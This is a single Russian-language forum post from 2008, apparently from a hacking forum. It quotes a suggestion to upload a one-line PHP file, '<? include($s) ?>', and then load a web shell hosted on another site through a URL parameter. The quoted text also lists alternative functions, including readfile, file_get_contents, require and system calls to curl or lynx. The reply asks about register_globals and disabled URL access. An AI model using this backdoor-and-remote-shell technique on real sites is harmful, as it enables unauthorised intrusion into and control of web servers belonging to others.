Показать сообщение отдельно

  #9  
Старый 23.03.2008, 18:10
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
С нами: 10362626

Репутация: 327
По умолчанию

Цитата:
Spaise как вариант можно залить фаил с содержанием <? include($s) ?>
назовём его a.php к примеру тогда шелл подключается таким образом
http//site.com/a.php?s=http//sait2.com/фаил с шелом .php
в место include() можно использовать ещё и :
readfile()
fopen+fwrite+feof+fread
file_get_contents()
require()
не говоря уже про system('curl/get/fetch/lynx/etc')...
почему сразу <? include($s) ?>

а если register_globals off? а если url access disabled?)

Последний раз редактировалось blackybr; 23.03.2008 в 18:21..
 
Ответить с цитированием